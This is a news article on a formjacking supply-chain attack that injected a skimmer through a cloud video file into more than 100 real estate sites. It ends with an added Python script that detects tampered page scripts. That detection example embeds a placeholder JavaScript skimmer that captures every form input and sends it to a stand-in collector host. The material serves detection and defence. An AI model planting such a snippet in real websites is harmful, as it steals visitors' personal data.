Formjacking Campaign Leverages Cloud Video Platform
Attacker Targeted Hundreds of Real Estate Websites
A new supply chain attack is targeting hundreds of real estate websites by injecting card-skimming malware into a cloud video platform.
However, Brightcove subsequently contacted Information Security Media Group to clarify that, while the attack occurred through a compromised file that had been uploaded, it did not originate from within Brightcove, and said that no Brightcove players or accounts were accessed. A Brightcove spokesperson told ISMG: "A Brightcove customer experienced a security issue that originated with videos stored by the customer on a third-party solution, and at no point were other customers, or their end-users, at risk due to this incident. Brightcove operates a highly secure video platform and offers a number of solutions to ensure a secure video experience for our customers. If our customers or partners experience security threats to their systems that would impact their use of our services, we work closely with them to remedy any vulnerabilities as quickly as possible and offer support from our team of experts."
Brightcove is a cloud-based online video platform headquartered in Boston, Massachusetts. It is understood to serve the more than 900 global franchise holders of Sotheby’s Realty, a luxury real estate brand headquartered in New Jersey, founded by the Sotheby's fine art auction house and run jointly with US-based Realogy Holdings Corp. While Unit 42 did not say where the attacked or compromised websites were located, it did say that "hundreds" of websites were targeted, which makes a global spread of targets likely.
Unit 42 reported that more than 100 real estate sites were compromised by the same skimmer.
"From the code analysis, we know the skimmer snippet is trying to gather victims’ sensitive information such as names, emails, phone numbers, and send them to a collection server, https://cdn-imgcloud[.]com/img, which is also marked as malicious in VirusTotal," the researchers say.
Further analysis showed that the compromised sites belong to one parent company and that all of them were importing the same video, accompanied by malicious scripts, from a cloud video platform.
Casting a Wide Net
"Supply chain attacks come in many shapes and forms. While most of the headline-grabbing attacks are often targeted against large organizations, there are many instances where criminals will cast a wider net to infect as many organizations as possible," says Javvad Malik, security awareness advocate at security firm KnowBe4.
The Unit 42 researchers describe the skimmer as highly polymorphic, elusive and continuously evolving; combined with a cloud distribution platform, they say, a skimmer of this type can have a very large impact.
"We have to invent more sophisticated strategies to detect skimmer campaigns of this type, since merely blocking domain names or URLs used by skimmers is ineffective," the researchers say.
No Easy Fix
Malik says that many industries use shared services for documents, videos and photos. "These are often most susceptible to attack and can go undetected for longer," he says, and he recommends that organizations carefully vet third parties and use monitoring controls to check for unexpected behavior.
"Unfortunately, there isn't an easy fix for supply chain attacks, and it involves all concerned parties to do their part in ensuring everyone remains secure," Malik says.
The researchers say they worked with the cloud video platform and the real estate company to remove the malware before publishing their blog post, adding: "We're publishing this piece to alert organizations and web surfers of the potential for supply chain attacks to infect legitimate websites without the knowledge of those organizations."
They recommend that website administrators safeguard their accounts and manage permissions carefully so that credentials cannot be stolen through phishing or social engineering. They also say site owners should conduct web content integrity checks on a regular basis to detect and prevent the injection of malicious code into website content.
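One way to implement the content integrity check the researchers recommend, as an added example that is not code from the article, from Unit 42 or from any of the companies named: the Python script below takes a baseline of a page (the URL of every external script plus a SHA-256 of each script body, fetched for external scripts and read directly for inline ones) and reports drift on a later run. Because it hashes the imported script bodies rather than matching domains, it flags a tampered player script even when the site's own HTML is unchanged and the skimmer's collection domain has never been seen before, which is the gap the researchers point to when they say that blocking domain names alone is ineffective. The page HTML, the player script, the "tampered" copy and the collector URL are all constructed for the example; the injected snippet is a placeholder, not the actual skimmer.

```python
# Added example for this article (not code from Unit 42, Brightcove, Sotheby's
# Realty or ISMG): baseline-and-compare integrity check over the scripts a page
# executes. Sample page, player script and tampered copy are constructed; the
# injected snippet is a placeholder, not the real skimmer.
import base64
import hashlib
from html.parser import HTMLParser
from typing import Callable, List


class ScriptCollector(HTMLParser):
    """Records external <script src> URLs and the bodies of inline scripts."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf).strip().encode())
            self._buf = None


def snapshot(html: str, fetch: Callable[[str], bytes]) -> dict:
    """Hash every script the page would run; `fetch` returns a URL's body."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()

    def digest(body: bytes) -> str:
        return hashlib.sha256(body).hexdigest()

    return {"external": {src: digest(fetch(src)) for src in parser.external},
            "inline": {digest(body) for body in parser.inline}}


def compare(baseline: dict, current: dict) -> List[str]:
    """Drift findings between two snapshots; an empty list means no change."""
    findings = []
    for src, digest in current["external"].items():
        if src not in baseline["external"]:
            findings.append(f"new external script: {src}")
        elif digest != baseline["external"][src]:
            findings.append(f"external script body changed: {src}")
    for src in sorted(baseline["external"].keys() - current["external"].keys()):
        findings.append(f"external script missing: {src}")
    for d in sorted(current["inline"] - baseline["inline"]):
        findings.append(f"new or changed inline script sha256={d[:16]}")
    for d in sorted(baseline["inline"] - current["inline"]):
        findings.append(f"inline script removed or changed sha256={d[:16]}")
    return findings


def sri_value(script_body: bytes) -> str:
    """Subresource Integrity attribute value for a script whose content should stay fixed."""
    return "sha384-" + base64.b64encode(hashlib.sha384(script_body).digest()).decode()


# Constructed sample: the site's HTML is identical in both runs; only the
# script imported from the (hypothetical) video platform host changes.
PAGE_HTML = """<html><body><div id="listing-video"></div>
<script src="https://video-platform.example/player.js"></script>
<script>window.listing = {"id": 12345};</script></body></html>"""
PLAYER_JS = b"(function(){ window.Player = { play: function(id){} }; })();"
INJECTED_JS = b"""/* placeholder skimmer; hypothetical collector URL */
document.querySelectorAll("input").forEach(function (f) { f.addEventListener("change",
  function () { new Image().src = "https://collector.example/img?d=" +
  encodeURIComponent(f.name + "=" + f.value); }); });"""
BASELINE_FILES = {"https://video-platform.example/player.js": PLAYER_JS}
TAMPERED_FILES = {"https://video-platform.example/player.js": PLAYER_JS + INJECTED_JS}


def run_example() -> List[str]:
    """Baseline taken with the clean player, then rechecked after tampering."""
    baseline = snapshot(PAGE_HTML, BASELINE_FILES.__getitem__)
    return compare(baseline, snapshot(PAGE_HTML, TAMPERED_FILES.__getitem__))


if __name__ == "__main__":
    for finding in run_example() or ["no drift detected"]:
        print(finding)
    print(f'pin with integrity="{sri_value(PLAYER_JS)}"')
```

Run it on a schedule against the live page with `fetch` replaced by an HTTP client, and keep the baseline outside the web root so that a compromise of the site cannot rewrite it. `sri_value` produces the Subresource Integrity attribute for pinning a script whose content is expected to stay fixed; the browser then refuses a changed file outright, although that is only practical for scripts the provider does not update in place. A static check like this sees only what the servers send; code that a third-party script injects at runtime requires snapshotting the rendered DOM in a headless browser instead.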